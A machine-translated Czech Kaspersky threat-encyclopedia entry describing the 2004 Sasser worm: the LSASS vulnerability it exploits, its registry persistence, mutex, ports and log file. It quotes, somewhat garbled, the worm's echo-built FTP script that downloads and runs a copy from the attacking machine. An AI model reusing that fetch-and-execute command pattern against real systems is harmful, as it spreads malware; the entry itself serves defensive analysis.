English
Russian
Japanese
LatAm
Türkiye
Brasil
France
Český
Deutschland
Tato služba může obsahovat Google překlady. Společnost Google odmítá veškerou odpovědnost za překlad, doslovný i předpokládaný, včetně veškerých záruk aktuálnosti, spolehlivosti a veškerých záruk předpokládané zobchodovatelnosti, vhodnosti pro daný účel a neporušení práv.
Web Kaspersky Lab byl přeložen překládacím softwarem založeným na Google Translate. Bylo vynaloženo přiměřené úsilí, aby byl zajištěn přesný překlad, avšak žádný automatický překlad není dokonalý a není určen k nahrazení lidských překladatelů. Překlady jsou poskytovány jako služba uživatelům webových stránek a jsou poskytovány „tak jak jsou“. Neexistuje žádná záruka jakéhokoliv druhu, na vyjádřený nebo předpokládaný překlad, na přesnost nebo správnost překladů. Některý obsah (například obrázky, videa, Flash atd.) Nemusí být přesně přeložen z důvodu omezení překladového softwaru.
Net-Worm.Win32.Sasser
| Detekováno | 05/13/2004 |
| Třída | Net-Worm |
| Platfoma | Win32 |
| Popis |
Sasser je internetový červ, který využívá chybu zabezpečení systému MS Windows LSASS popsané v bulletinu zabezpečení MS04-011 společnosti Microsoft . Společnost Microsoft vydala patch této zranitelnosti 13. dubna 2004, zatímco Sasser.a byla poprvé detekována 30. dubna 2004. Sasser funguje velmi podobným způsobem jako Lovesan, kromě toho, že Lovesan využíval zranitelnost v službě PRC DCOM, nikoliv službu LSASS. Systém Sasser ovlivňuje počítače se systémy Windows 2000, Windows XP a Windows Server 2003. Sasser funguje na všech ostatních verzích systému Windows, ale nemůže je napadnout napadením prostřednictvím této chyby zabezpečení. Sasser je napsán v C / C ++ pomocí kompilátoru Visual C. Šnek je asi 15 KL a je zabalen PECompact2. Známky infekce
PropagacePo spuštění se Sasser zkopíruje do kořenového adresáře systému Windows pod názvem avserve.exe a registruje tento soubor v registru autorun registru systému: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "avserve.exe" = "% WINDIR% avserve.exe" Společnost Sasser vytvoří v paměti RAM jedinečný identifikátor "Jobaka31", aby si v případě budoucích pokusů o infekci našel kopie sebe sama. Společnost Sasser spouští server FTP na portu TCP 5554 a poté spouští 128 rutin pro šíření. Během tohoto procesu se červ pokusí spustit proces AbortSystemShutdown, aby zakázal restart systému. Sasser iniciuje skenování adres IP, aby identifikoval adresy obětí a pošle požadavek na port TCP 445. Pokud nějaké počítače reagují, Sasser využívá chybu zabezpečení LSASS k spuštění příkazového shellu "cmd.exe" na portu TCP 9996. Konečně Sasser, povolují infikovanému počítači stáhnout a spustit hlavní komponentu červ pod názvem "N_up.exe", kde "N" je náhodné číslo: echo vypnuto echo open [útočná adresa počítače] 5554 >> cmd.ftp echo anonymní >> cmd.ftp echo uživatele echo bin >> cmd.ftp echo get [náhodné číslo] _up.exe >> cmd.ftp echo bye >> cmd.ftp echo na ftp -s: cmd.ftp [náhodné číslo] _up.exe echo vypnuto del cmd.ftp echo na V důsledku toho může být jeden počítač napaden vícekrát a obsahuje vícenásobné kopie červa s názvy vzorků, jako například: 23101_up.exe 5409_up.exe a tak dále. jinýPo infekci zařízení poškozeného generuje chybovou zprávu o selhání služby LSASS, načež se může pokusit restartovat. Sasser vytvoří soubor 'win.log' v kořenovém adresáři jednotky C, kde červa zaznamená IP adresy všech napadených počítačů. |
Odkaz na originál |
|
| Zjistěte statistiky hrozeb šířících se ve vašem regionu |